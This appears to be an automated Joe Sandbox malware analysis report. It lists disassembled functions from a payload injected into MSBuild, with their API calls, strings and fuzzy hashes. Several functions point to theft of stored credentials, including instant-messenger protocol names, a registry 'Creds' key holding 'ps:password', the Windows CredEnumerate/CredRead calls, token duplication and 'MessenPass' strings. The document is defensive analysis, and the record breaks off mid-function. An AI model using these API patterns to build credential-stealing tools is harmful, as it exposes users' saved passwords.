Opcode Fuzzy Hash: fe56d977aabb073792e25c405abe676263accf88416be629dc76c317c79dc49e
Instruction Fuzzy Hash: 7FA16DB6D002199BDF10DFA5D844AEEB7B8FF44304F00846BEA19F7281E7789A45CB95

Function 0040E8FD Relevance: 21.1, APIs: 7, Strings: 7, Instructions: 100COMMON

Download Yara Rule

APIs

_strcmpi.MSVCRT ref: 0040E936
_strcmpi.MSVCRT ref: 0040E957

Strings

prpl-yahoo, xrefs: 0040E951
prpl-msn, xrefs: 0040E90F
prpl-jabber, xrefs: 0040E972
prpl-oscar, xrefs: 0040E9AE
prpl-gg, xrefs: 0040E9CC
prpl-novell, xrefs: 0040E990
prpl-irc, xrefs: 0040E9EA

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: _strcmpi
String ID: prpl-gg$prpl-irc$prpl-jabber$prpl-msn$prpl-novell$prpl-oscar$prpl-yahoo
API String ID: 1439213657-1061492575
Opcode ID: d08d5dad979f9fb4092b5930b19311ec033bd7c838c8b2128e13e64409b95641
Instruction ID: 427b895755571877c56e738dc42ee4b060dd70cd0f3c6fd0f8b1603a1220432f
Opcode Fuzzy Hash: d08d5dad979f9fb4092b5930b19311ec033bd7c838c8b2128e13e64409b95641
Instruction Fuzzy Hash: 5031D6B124C3455ED730EE22954A7EB77D4AB90719F20082FF488A22C1EB7C59554B9F

Function 00409068 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 72COMMON

Download Yara Rule

APIs

_mbscpy.MSVCRT(0041E200,?), ref: 00409080
_mbscpy.MSVCRT(0041E308,general,0041E200,?), ref: 00409090

Part of subcall function 00408CA1: memset.MSVCRT ref: 00408CC6
Part of subcall function 00408CA1: GetPrivateProfileStringA.KERNEL32(0041E308,?,00417C88,?,00001000,0041E200), ref: 00408CEA
Part of subcall function 00408CA1: WritePrivateProfileStringA.KERNEL32(0041E308,?,?,0041E200), ref: 00408D01

EnumResourceNamesA.KERNEL32(?,00000004,Function_00008EAA,00000000), ref: 004090D1
EnumResourceNamesA.KERNEL32(?,00000005,Function_00008EAA,00000000), ref: 004090DB
_mbscpy.MSVCRT(0041E308,strings), ref: 004090E3
memset.MSVCRT ref: 004090FF
LoadStringA.USER32(?,00000000,?,00001000), ref: 00409113

Part of subcall function 00408D0F: _itoa.MSVCRT ref: 00408D30

Strings

TranslatorURL, xrefs: 004090A6
Version, xrefs: 004090B1
general, xrefs: 00409085
strings, xrefs: 004090DD
TranslatorName, xrefs: 0040909B

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
String ID: TranslatorName$TranslatorURL$Version$general$strings
API String ID: 1035899707-2179912348
Opcode ID: 0e67f2f42cdfcc6d6620761b8a7d89372e721f023a66968946340eb0cc98dc02
Instruction ID: 8f59c47c41e75b0ef1e028ad246d3c9450943cc5e9d1e56adfa21ee2aa94ac58
Opcode Fuzzy Hash: 0e67f2f42cdfcc6d6620761b8a7d89372e721f023a66968946340eb0cc98dc02
Instruction Fuzzy Hash: 4211E93164025879E7212717EC4AFCB3E6C9F85B59F14407FBA49BA0C1CABD99C086BC

Function 0041102B Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,?,0041115C,00404495,00000000,00000000,00000000), ref: 0041103A
GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00411053
GetProcAddress.KERNEL32(00000000,Module32First), ref: 00411064
GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00411075
GetProcAddress.KERNEL32(00000000,Process32First), ref: 00411086
GetProcAddress.KERNEL32(00000000,Process32Next), ref: 00411097

Strings

Process32First, xrefs: 00411080
Module32Next, xrefs: 0041106F
Process32Next, xrefs: 00411091
CreateToolhelp32Snapshot, xrefs: 0041104D
Module32First, xrefs: 0041105E
kernel32.dll, xrefs: 00411035

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
API String ID: 667068680-3953557276
Opcode ID: 2211e89b0737fecda3037a560225c9ed33993fa6787b657681e5e05db23e2a88
Instruction ID: 36442a69f5807846e20e8f789375593bd69b00a93b3bf86530e8c97bdb066b37
Opcode Fuzzy Hash: 2211e89b0737fecda3037a560225c9ed33993fa6787b657681e5e05db23e2a88
Instruction Fuzzy Hash: 46F01D39E00362DD97209B26BD40BE73EE5578DB80715803BE908D2264DBB894C38FAD

Function 004100A4 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 117registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(004104FD,Creds,00000000,00020019,004104FD,00000040,0041B008,?,?,004104FD,?,?,?,?), ref: 004100C8
memset.MSVCRT ref: 004100EA
RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 00410117
RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 00410144
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?), ref: 004101B2
LocalFree.KERNEL32(?), ref: 004101C5
RegCloseKey.ADVAPI32(?), ref: 004101D0
RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 004101E7
RegCloseKey.ADVAPI32(?), ref: 004101F8

Strings

ps:password, xrefs: 00410135
Creds, xrefs: 004100C0

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: CloseOpen$ByteCharEnumFreeLocalMultiQueryValueWidememset
String ID: Creds$ps:password
API String ID: 551151806-1872227768
Opcode ID: 20f5c7480319690d4c614e4d7b7dd4f29f763a09612276579ba8a91edcf23ce4
Instruction ID: f68ec8314172e0547355e42bda77cc46fbcb66bc12c1f5db7d7ae7cb92940bd3
Opcode Fuzzy Hash: 20f5c7480319690d4c614e4d7b7dd4f29f763a09612276579ba8a91edcf23ce4
Instruction Fuzzy Hash: A141F5B2901119EFDB11DF95DC84EEFBBBCEF0C754F0040A6F905E2150EA359A949BA4

Function 00405C4E Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 115libraryloaderCOMMON

Download Yara Rule

APIs

SetRect.USER32(?,00000001,00000001,00000001,00000001), ref: 00405C6D
MapDialogRect.USER32(?,?), ref: 00405C7D
memset.MSVCRT ref: 00405D4B
sprintf.MSVCRT ref: 00405D6E
SetWindowTextA.USER32(?,?), ref: 00405D83
LoadLibraryA.KERNEL32(shlwapi.dll,000003ED), ref: 00405D90
GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 00405D9E
FreeLibrary.KERNEL32(00000000), ref: 00405DB1

Strings

shlwapi.dll, xrefs: 00405D8B
%s:, xrefs: 00405D68
SHAutoComplete, xrefs: 00405D98

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: LibraryRect$AddressDialogFreeLoadProcTextWindowmemsetsprintf
String ID: %s:$SHAutoComplete$shlwapi.dll
API String ID: 2601263068-2802052640
Opcode ID: ab2cf4164b993b72bb3261ad71969f56e00e3f563b2705c4529dda320590d4ba
Instruction ID: b550a958d3f196041ff417ee8ca2f57d98087dd1caa8e181cbf0d69f42a088e7
Opcode Fuzzy Hash: ab2cf4164b993b72bb3261ad71969f56e00e3f563b2705c4529dda320590d4ba
Instruction Fuzzy Hash: D0410B71A00209EFDB11DF94DC496EEBBB8EF48309F10846AE905B7251D7789A858F54

Function 00411172 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 81stringCOMMON

Download Yara Rule

APIs

strchr.MSVCRT ref: 0041118A
_mbscpy.MSVCRT(?,-00000001), ref: 00411198

Part of subcall function 00407139: strlen.MSVCRT ref: 0040714B
Part of subcall function 00407139: strlen.MSVCRT ref: 00407153
Part of subcall function 00407139: _memicmp.MSVCRT ref: 00407171

_mbscpy.MSVCRT(?,00000000,00000000,?,00000000,00000104,00000000), ref: 004111E8
_mbscat.MSVCRT ref: 004111F3
memset.MSVCRT ref: 004111CF

Part of subcall function 00406BC3: GetWindowsDirectoryA.KERNEL32(0041E458,00000104,?,00411228,00000000,?,00000000,00000104,00000000), ref: 00406BD8
Part of subcall function 00406BC3: _mbscpy.MSVCRT(00000000,0041E458,?,00411228,00000000,?,00000000,00000104,00000000), ref: 00406BE8

memset.MSVCRT ref: 00411217
memcpy.MSVCRT(?,00000000,00000002,00000000,?,00000000,00000104,00000000), ref: 00411232
_mbscat.MSVCRT ref: 0041123D

Strings

\systemroot, xrefs: 004111A5

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
String ID: \systemroot
API String ID: 912701516-1821301763
Opcode ID: 218f5e9704a1aeb6310374669f71ec2bdb1fcc002080e651c6f93d871d085d50
Instruction ID: 1deae77e6ad71c1ffcfab25ec4cb50ddae9004d97205ddf1ac571f940d5d67aa
Opcode Fuzzy Hash: 218f5e9704a1aeb6310374669f71ec2bdb1fcc002080e651c6f93d871d085d50
Instruction Fuzzy Hash: F921D77150820479EB60A7619C83FEBB7EC4F15709F10409FF789E10C1EAACABC5466A

Function 004088D4 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowstringCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(?), ref: 004088EA
memset.MSVCRT ref: 0040890E
GetMenuItemInfoA.USER32(?), ref: 00408944
memset.MSVCRT ref: 00408971
strchr.MSVCRT ref: 0040897D
_mbscat.MSVCRT ref: 004089D8
ModifyMenuA.USER32(?,?,00000400,?,?), ref: 004089F4

Strings

6, xrefs: 00408934
0, xrefs: 00408929

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: Menu$Itemmemset$CountInfoModify_mbscatstrchr
String ID: 0$6
API String ID: 3540791495-3849865405
Opcode ID: 279e0e3116dd7a36083eff5afaa6bfe1abce752894615ec7df7e32fa7ef46b8e
Instruction ID: a8fe6fb1212bd118e16e367106d6d34f7a286138b6ca25e595fdc587e8241262
Opcode Fuzzy Hash: 279e0e3116dd7a36083eff5afaa6bfe1abce752894615ec7df7e32fa7ef46b8e
Instruction Fuzzy Hash: 0C31BFB2408380AFC7209F55D941AABBBE8EB84314F04483FF588A2251D778D984CF5A

Function 00404D7A Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 52libraryloaderwindowCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404D99
GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404DAB
FreeLibrary.KERNEL32(00000000), ref: 00404DBF
MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404DEA

Strings

comctl32.dll, xrefs: 00404D82
Error: Cannot load the common control classes., xrefs: 00404DE4
Error, xrefs: 00404DDF
InitCommonControlsEx, xrefs: 00404DA5

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: Library$AddressFreeLoadMessageProc
String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
API String ID: 2780580303-317687271
Opcode ID: 0271221c947319f8f9baa3460b985664642af3c5e03074db1750b5e73f8f99f3
Instruction ID: eec6f3f66ef6417fb43289990c32370c6d67362bb519490399a3c202bd773795
Opcode Fuzzy Hash: 0271221c947319f8f9baa3460b985664642af3c5e03074db1750b5e73f8f99f3
Instruction Fuzzy Hash: 6701D671751615ABD3215BA09C49BEB3EA8DFC9749B118139E206F2180DFB8CA09829C

Function 00404109 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 35libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00404170: FreeLibrary.KERNEL32(?,00404111,00000000,0040FFAB,75A8EC10), ref: 00404177

LoadLibraryA.KERNEL32(advapi32.dll,00000000,0040FFAB,75A8EC10,?,?,?,?,?,?,?,?,?,?,?,0040DB18), ref: 00404116
GetProcAddress.KERNEL32(00000000,CredReadW), ref: 0040412F
GetProcAddress.KERNEL32(?,CredFree), ref: 0040413B
GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404147

Strings

CredReadW, xrefs: 00404129
CredFree, xrefs: 00404131
advapi32.dll, xrefs: 00404111
CredEnumerateW, xrefs: 0040413D

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: AddressProc$Library$FreeLoad
String ID: CredEnumerateW$CredFree$CredReadW$advapi32.dll
API String ID: 2449869053-331516685
Opcode ID: 521c868f04d398ed4da8af9e7a80e13fe4feb64e4d3800075c34db4e7e47eec4
Instruction ID: 12efa8cab8f3f54fa256443a021a4d85af4a352dd089a4683602f903f3396d9b
Opcode Fuzzy Hash: 521c868f04d398ed4da8af9e7a80e13fe4feb64e4d3800075c34db4e7e47eec4
Instruction Fuzzy Hash: E7F0FFB06087009AD770AF75DC09B97BAF4AFD8700B25883FE195A6690D77DE8C1CB58

Function 0040955A Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 157COMMON

Download Yara Rule

APIs

Part of subcall function 00409370: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040956A), ref: 0040937C
Part of subcall function 00409370: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040956A), ref: 0040938A
Part of subcall function 00409370: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040956A), ref: 0040939B
Part of subcall function 00409370: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040956A), ref: 004093B2
Part of subcall function 00409370: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040956A), ref: 004093BB

??2@YAPAXI@Z.MSVCRT(00000000), ref: 00409591
??2@YAPAXI@Z.MSVCRT(00000000,00000000), ref: 004095AD
memcpy.MSVCRT(?,0041B8D8,00000014), ref: 004095D5
memcpy.MSVCRT(?,0041B8C4,00000010,?,0041B8D8,00000014), ref: 004095F2
??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040967B
??2@YAPAXI@Z.MSVCRT(0000000C,00000000), ref: 00409685
??2@YAPAXI@Z.MSVCRT(00000000), ref: 004096BD

Part of subcall function 0040876F: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408838
Part of subcall function 0040876F: memcpy.MSVCRT(00000000,00000001), ref: 00408877

Part of subcall function 0040876F: _mbscpy.MSVCRT(0041E308,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403FEE,MessenPass), ref: 004087EA
Part of subcall function 0040876F: strlen.MSVCRT ref: 00408808

Strings

$, xrefs: 00409645
d, xrefs: 0040969C

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: ??2@??3@$memcpy$LoadString_mbscpystrlen
String ID: $$d
API String ID: 2915808112-2066904009
Opcode ID: 83977fa4547c2105a15e70559c2e4334156e97c5c74def1868066ed2ae587b6c
Instruction ID: c86123869de2e32e5bed1250838fccac9115591d6117e5efa9fb73667f4d6fb1
Opcode Fuzzy Hash: 83977fa4547c2105a15e70559c2e4334156e97c5c74def1868066ed2ae587b6c
Instruction Fuzzy Hash: D8514971A01704AFDB24DF29D582BAAB7F4FF48314F10852EE55ADB292DB74E9408F44

Function 004134D0 Relevance: 13.6, APIs: 9, Instructions: 61windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 004134D2
GetWindowLongA.USER32(00000000,000000EC), ref: 004134E4
GetWindowLongA.USER32(00000000,000000F0), ref: 004134EF
GetClassNameA.USER32(00000000,?,000003FF), ref: 00413505
GetWindowTextA.USER32(00000000,?,000003FF), ref: 00413511
GetWindowRect.USER32(00000000,?), ref: 0041351F
CopyRect.USER32(?,?), ref: 00413533
MapWindowPoints.USER32(00000000,?,?,00000002), ref: 00413541
SendMessageA.USER32(00000000,00000031,00000000,00000000), ref: 0041359A

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: Window$LongRect$ClassCopyMessageNameParentPointsSendText
String ID:
API String ID: 2317770421-0
Opcode ID: 7af2e41bf762aae8540d43ee514e8ccf414c9672fa24b186be0172eacc68f4a9
Instruction ID: beb27d93b7d0259d1707648e93b0cb5b486bd7e44cd55be4178ee0c76b875b45
Opcode Fuzzy Hash: 7af2e41bf762aae8540d43ee514e8ccf414c9672fa24b186be0172eacc68f4a9
Instruction Fuzzy Hash: BF21A6B5500B01EFD7609F75DC88AD7BBEDFB88700F00CA2DA5AAD2254DA306541CFA4

Function 0041244B Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 60COMMON

Download Yara Rule

APIs

memcpy.MSVCRT(?,",00000006,?,?,00000000,0040A4AC,?,?), ref: 0041247B
memcpy.MSVCRT(?,&,00000005,?,?,00000000,0040A4AC,?,?), ref: 004124A1
memcpy.MSVCRT(?,<,00000004,?,?,00000000,0040A4AC,?,?), ref: 004124B9

Strings

<br>, xrefs: 004124B3
", xrefs: 00412475
>, xrefs: 00412468
°, xrefs: 0041248E
<, xrefs: 0041245C
&, xrefs: 0041249B

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: memcpy
String ID: &$°$>$<$"$<br>
API String ID: 3510742995-3273207271
Opcode ID: 13415ff2963e6dace8cd86106c59db4403270bd4b6c64038e468014c2b1c2be9
Instruction ID: f5a03e54b86e24f841f817b97e8ec33e4e13f45a83786b80a5cfcbc9bb1d817d
Opcode Fuzzy Hash: 13415ff2963e6dace8cd86106c59db4403270bd4b6c64038e468014c2b1c2be9
Instruction Fuzzy Hash: 0401DFB2EC465475EB3201093E4AFE72A4447B7B21F660667F589A0285E0DD0EF381BF

Function 004044DE Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 59libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00410DAA: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00410DC0

FreeLibrary.KERNEL32(00000000,000000FF,0000000E,?,?,0040428D), ref: 0040456E

Part of subcall function 00410D8A: LoadLibraryA.KERNEL32(advapi32.dll,00410DB5,00000000,00000000,004044F8,000000FF,0000000E,?,?,0040428D), ref: 00410D94

GetProcAddress.KERNEL32(00000000,DuplicateToken), ref: 0040451C
GetProcAddress.KERNEL32(00000000,SetThreadToken), ref: 00404543
CloseHandle.KERNEL32(?), ref: 00404553
CloseHandle.KERNEL32(?,00000000,000000A0,000000FF,0000000E,?,?,0040428D), ref: 0040455D

Strings

SetThreadToken, xrefs: 0040453B
DuplicateToken, xrefs: 00404514

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: AddressProc$CloseHandleLibrary$FreeLoad
String ID: DuplicateToken$SetThreadToken
API String ID: 3357505703-785560009
Opcode ID: ead61f231025bced0a09c2f1fb3dd8adab68ce1b78bee45ece79c7bb5241faa8
Instruction ID: fb771c117c903999f7ab115302b4b85a9bfa7a6589c8aae05a31450a7ce75296
Opcode Fuzzy Hash: ead61f231025bced0a09c2f1fb3dd8adab68ce1b78bee45ece79c7bb5241faa8
Instruction Fuzzy Hash: D4113071900109FBDB10E7A5DD55EEE7B78AF84340F144176A611B10E1EB74DF44DA68

Function 00405865 Relevance: 12.2, APIs: 4, Strings: 4, Instructions: 202stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040588A
strlen.MSVCRT ref: 00405910
memset.MSVCRT ref: 0040595D
memset.MSVCRT ref: 0040596F

Strings

', xrefs: 0040592F
', xrefs: 00405915
S'username', xrefs: 00405A85
S'password', xrefs: 00405AA0

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: memset$strlen
String ID: '$'$S'password'$S'username'
API String ID: 3337090206-859024053
Opcode ID: e1cab7f00341b9ec69ea1fd77629a3ef37b3dcc5a417ad93794562d5d2f9417f
Instruction ID: 095c589e2a809376e97825867b0f887a5e853f6b8f709b3ead32f3d6acc6b9c2
Opcode Fuzzy Hash: e1cab7f00341b9ec69ea1fd77629a3ef37b3dcc5a417ad93794562d5d2f9417f
Instruction Fuzzy Hash: A5716071D0065DAECF21DB94C881BEFBBB4EF1A314F5041ABD444B7282D6385A8A8F59

Function 0040AC28 Relevance: 12.1, APIs: 8, Instructions: 108windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,00001003,00000001,?), ref: 0040AC75
SendMessageA.USER32(?,00001003,00000000,?), ref: 0040ACAA
LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040ACDF
LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040ACFB
GetSysColor.USER32(0000000F), ref: 0040AD0B
DeleteObject.GDI32(?), ref: 0040AD3F
DeleteObject.GDI32(00000000), ref: 0040AD42
SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040AD60

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: MessageSend$DeleteImageLoadObject$Color
String ID:
API String ID: 3642520215-0
Opcode ID: 89608fa394cce56546426f1758b6b0ed6a96b027106975741db31758971510ff
Instruction ID: 10adafa9a034a25fdfd439dfbbefb27d9cbe3ef8874ff0eb0b967345faf6b271
Opcode Fuzzy Hash: 89608fa394cce56546426f1758b6b0ed6a96b027106975741db31758971510ff
Instruction Fuzzy Hash: B8316171680708BFFA316B60DC47FD67695EB88B00F104829F3857A1E1CAF278909B58

Function 00408D47 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77windowstringCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(?), ref: 00408D5C
memset.MSVCRT ref: 00408D7D
GetMenuItemInfoA.USER32 ref: 00408DB8
strchr.MSVCRT ref: 00408DCF

Strings

0, xrefs: 00408D98
6, xrefs: 00408DA0

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: ItemMenu$CountInfomemsetstrchr
String ID: 0$6
API String ID: 2300387033-3849865405
Opcode ID: c4cc32d9f86e60e61665d107887000d313b636c57177f5370dd8caf8ca2e51bb
Instruction ID: e6c6313dcb9b7a471bbfbaa7ec765517bc0a4c64eff5ea5afbcc667e6a019d72
Opcode Fuzzy Hash: c4cc32d9f86e60e61665d107887000d313b636c57177f5370dd8caf8ca2e51bb
Instruction Fuzzy Hash: DD21BF71408384AFD7118F11D881A9BB7E8FF85348F044A3FF584A62D0EB39D944CB9A

Function 00407034 Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 59stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00407055
sprintf.MSVCRT ref: 0040707E
strlen.MSVCRT ref: 0040708A
memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,?), ref: 0040709F
strlen.MSVCRT ref: 004070AD
memcpy.MSVCRT(00000001,?,00000001,?,00000000,00000000,00000001,00000000,00000000,%s (%s),?,?), ref: 004070BD

Strings

%s (%s), xrefs: 00407078

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: memcpystrlen$memsetsprintf
String ID: %s (%s)
API String ID: 3756086014-1363028141
Opcode ID: 936799879657ece0d987efaaa21eb692f92e76d5c857caaa6a1a5a279cf2af51
Instruction ID: a198fb7af375a94c8e27cd288863d28c10177bb58caa4549e63a683f86c2f09a
Opcode Fuzzy Hash: 936799879657ece0d987efaaa21eb692f92e76d5c857caaa6a1a5a279cf2af51
Instruction Fuzzy Hash: 93114FB2800158BBDB21DF69DC45BDABBBCEF01309F0005AAE644B7101D775AB55CBA5

Function 0040496D Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 37COMMON

Download Yara Rule

APIs

_mbscat.MSVCRT ref: 004049BE
_mbscpy.MSVCRT(?,memcpy,?,eK@,00000000,00404B65,00000000), ref: 004049CC
_mbscpy.MSVCRT(?,msvcrt.dll,?,memcpy,?,eK@,00000000,00404B65,00000000), ref: 004049DA

Strings

memcpy, xrefs: 004049C6
msvcrt.dll, xrefs: 004049D1
eK@, xrefs: 0040497B, 00404985

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: _mbscpy$_mbscat
String ID: eK@$memcpy$msvcrt.dll
API String ID: 2404237207-527332992
Opcode ID: 9354cc07b54c0733da4c2861e88293eeaaf788545539071674b28918bacbf150
Instruction ID: ade7c94f42c2b1d8f6f4d02d55b8563967db19c46ba0ec0bd93feed85f1333d3
Opcode Fuzzy Hash: 9354cc07b54c0733da4c2861e88293eeaaf788545539071674b28918bacbf150
Instruction Fuzzy Hash: 7701001144DBC089E372D7289549B97AEE51B22608F48098DD1C647A83D2AAB65CC3BA

Function 0040807D Relevance: 9.1, APIs: 6, Instructions: 98stringCOMMON

Download Yara Rule

APIs

memcpy.MSVCRT(?,?,00000004), ref: 00408094
memcpy.MSVCRT(?,?,00000004,?,?,00000004), ref: 004080A3

Part of subcall function 0040C929: memcpy.MSVCRT(?,?,00000008,00000000,?,?,?,004080BF,?,?,?,00000004,?,?,00000004), ref: 0040C9BA

Part of subcall function 0040C9C7: memset.MSVCRT ref: 0040C9E6
Part of subcall function 0040C9C7: memset.MSVCRT ref: 0040C9FC
Part of subcall function 0040C9C7: memcpy.MSVCRT(?,?,00000010,00000004), ref: 0040CA33
Part of subcall function 0040C9C7: memset.MSVCRT ref: 0040CA3D

memset.MSVCRT ref: 00408120
strlen.MSVCRT ref: 00408160
_mbscpy.MSVCRT(00000000,?), ref: 0040817F
_mbscpy.MSVCRT(?,00000000,00000000,?), ref: 0040818C

Memory Dump Source

Source File: 0000000F.00000002.1920446370.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd

Similarity

API ID: memcpymemset$_mbscpy$strlen
String ID:
API String ID: 2712745786-0
Opcode ID: 50e45666a0393e5ef850d505c3c738091cb5fcbebc819cab067422742a707744
Instruction ID: bdbe0c05a74f47d21f032104af17620136749afb05b7a30319e2a8bb584ff9b0
Opcode Fuzzy Hash: 50e45666a0393e5ef850d505c3c738091cb5fcbebc819cab067422742a707744
Instruction Fuzzy Hash: AC3194728001099ACF14EF65DC85BDE77BCAF44304F00446FE549E7181EB74A68A8BA5

Function 0040B8FA Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 70COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040B91A

Part of subcall function 0040876F: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408838
Part of subcall function 0040876F: memcpy.MSVCRT(00000000,00000001), ref: 00408877

